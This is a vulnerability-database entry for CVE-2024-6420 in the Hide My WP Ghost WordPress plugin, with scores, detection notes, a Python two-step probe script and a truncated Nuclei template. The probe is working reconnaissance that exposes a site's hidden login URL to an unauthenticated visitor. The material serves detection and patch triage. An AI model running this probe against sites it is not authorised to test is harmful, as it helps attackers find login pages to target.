CVE-2024-6420
Priority: P2 (60) · Severity: high · CVSS 3.1 base score: 8.6
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
Exploit · EPSS: 1.80% (75.8th percentile)
The Hide My WP Ghost WordPress plugin before 5.2.02 does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wpplugins | hide_my_wp_ghost | < 5.2.02 | 5.2.02 |
Detection & IOCs (extracted from sources)
- Probe for the vulnerability: send `GET /?gf_page=<randomstring>` (a request that makes WordPress call `auth_redirect()` for an unauthenticated visitor) and inspect the `Location` header of the response. A vulnerable site answers with a redirect whose target embeds the probe URL as `redirect_to` (the encoded fragment `%2F%3Fgf_page%3D<randomstring>&reauth=1`) but does not point at the stock `wp-login.php`; the redirect target is the hidden login URL.
- Fingerprint the plugin first: the string `/wp-content/plugins/hide-my-wp` in the page body confirms that Hide My WP Ghost is active.
- Interpretation: a redirect `Location` that carries the `redirect_to`/`reauth=1` query but no `wp-login.php` means the custom login page URL has been disclosed to an unauthenticated visitor. A redirect to `wp-login.php`, a 404 or a plain 200 is not a match.
- The Nuclei template chains the two steps: step 1 is an internal matcher for the plugin fingerprint, step 2 triggers the `auth_redirect` bypass. Both must match for a positive result, which keeps sites that expose `gf_page` but do not run the plugin out of the findings.
- Only versions strictly before 5.2.02 are affected; 5.2.02 and later are fixed, so a known plugin version is enough to triage a host when the probe cannot be run.
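The two-step probe described in the bullets above, as an added example that is neither the Nuclei template nor the plugin's code. It models an HTTP response as a hypothetical triple (status, `Location` header, body) so the matching logic can be exercised offline; the `SAMPLE_*` values are constructed, not captured from a real site, and `example.test` and `/my-secret-login/` are placeholders. `probe()` is the same logic wired to `urllib` for a live check.

```python
"""Offline model of the Hide My WP Ghost two-step probe (added example).

Assumes a hypothetical response triple (status, Location header, body).
All sample values below are constructed; nothing here was captured.
"""
import secrets
import urllib.error
import urllib.request
from urllib.parse import quote

# Step 1 fingerprint from the IOC list: plugin asset path in the body.
PLUGIN_MARKER = "/wp-content/plugins/hide-my-wp"
REDIRECT_CODES = {301, 302, 303, 307, 308}


def plugin_present(body: str) -> bool:
    """Step 1: Hide My WP Ghost assets are referenced by the page."""
    return PLUGIN_MARKER in body


def expected_redirect_fragment(token: str) -> str:
    """auth_redirect() sends the visitor to wp_login_url(<current URL>, reauth=True),
    so the Location header carries the URL-encoded probe path inside redirect_to,
    followed by '&reauth=1'. This is the substring the IOC list keys on."""
    return quote("/?gf_page=" + token, safe="") + "&reauth=1"


def hidden_login_leaked(status: int, location, token: str) -> bool:
    """Step 2: a redirect that carries the auth_redirect query string but does
    not point at the stock wp-login.php discloses the hidden login URL."""
    if status not in REDIRECT_CODES or not location:
        return False  # 200/404 responses are not a match
    if expected_redirect_fragment(token) not in location:
        return False  # unrelated redirect (home page, HTTPS upgrade, ...)
    return "wp-login.php" not in location


def hidden_login_path(location: str) -> str:
    """The disclosed login URL is everything before the query string."""
    return location.split("?", 1)[0]


def assess(home_body: str, probe_status: int, probe_location, token: str) -> bool:
    """Both conditions must hold, mirroring the template's two-step flow."""
    return plugin_present(home_body) and hidden_login_leaked(
        probe_status, probe_location, token)


def fetch(url: str):
    """GET without following redirects; returns (status, Location, body).
    Only probe() uses this; the constructed samples never touch the network."""
    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, req, fp, code, msg, headers, newurl):
            return None  # surface the 3xx instead of following it

    opener = urllib.request.build_opener(NoRedirect)
    try:
        resp = opener.open(url, timeout=10)
    except urllib.error.HTTPError as err:
        resp = err  # 3xx/4xx arrive as HTTPError, which still carries headers/body
    body = resp.read().decode("utf-8", "replace")
    return resp.code, resp.headers.get("Location"), body


def probe(base_url: str) -> bool:
    """Live version of assess() against base_url (e.g. https://blog.example.test)."""
    token = secrets.token_hex(6)  # fresh per run so the redirect_to match is unambiguous
    root = base_url.rstrip("/")
    _, _, home = fetch(root + "/")
    status, location, _ = fetch(f"{root}/?gf_page={token}")
    return assess(home, status, location, token)


# Constructed samples (not real captures): a leaking site, and a site whose
# redirect goes to the stock login page.
SAMPLE_TOKEN = "abc123"
SAMPLE_HOME = ('<link rel="stylesheet" href="https://example.test'
               '/wp-content/plugins/hide-my-wp/public/css/style.css">')
SAMPLE_LEAK = ("https://example.test/my-secret-login/?redirect_to="
               "https%3A%2F%2Fexample.test%2F%3Fgf_page%3Dabc123&reauth=1")
SAMPLE_STOCK = ("https://example.test/wp-login.php?redirect_to="
                "https%3A%2F%2Fexample.test%2F%3Fgf_page%3Dabc123&reauth=1")

if __name__ == "__main__":
    print("leak:", assess(SAMPLE_HOME, 302, SAMPLE_LEAK, SAMPLE_TOKEN),
          "->", hidden_login_path(SAMPLE_LEAK))
    print("stock:", assess(SAMPLE_HOME, 302, SAMPLE_STOCK, SAMPLE_TOKEN))
```

The token is generated per run and checked inside `redirect_to`, so a site that redirects every unknown path to its home page does not produce a false positive; requiring both the fingerprint and the redirect, as the template does, also drops hosts that merely answer `gf_page` requests without running the plugin.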
No detection rules found.
Nuclei
CVE-2024-6420 [HIGH] Hide My WP Ghost < 5.2.02 - Hidden Login Page Disclosure
nuclei · CVSS 8.6
The Hide My WP Ghost plugin does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.
Template:
```yaml
id: CVE-2024-6420
info:
  name: Hide My WP Ghost < 5.2.02 - Hidden Login Page Disclosure
  author: jpg0mez
  severity: high
  description: |
    The Hide My WP Ghost plugin does not prevent redirects to the login page via the auth_redirect WordPress function, allowing an unauthenticated visitor to access the hidden login page.
  impact: |
    Unauthenticated attackers can discover and access the hidden WordPress login page through auth_redirect exploitation, bypassing the plugin's security obfuscation.
  remediation: |
    Update Hide My WP Ghost plugin to versio
```
No writeups or analysis indexed.
Published: 2024-07-23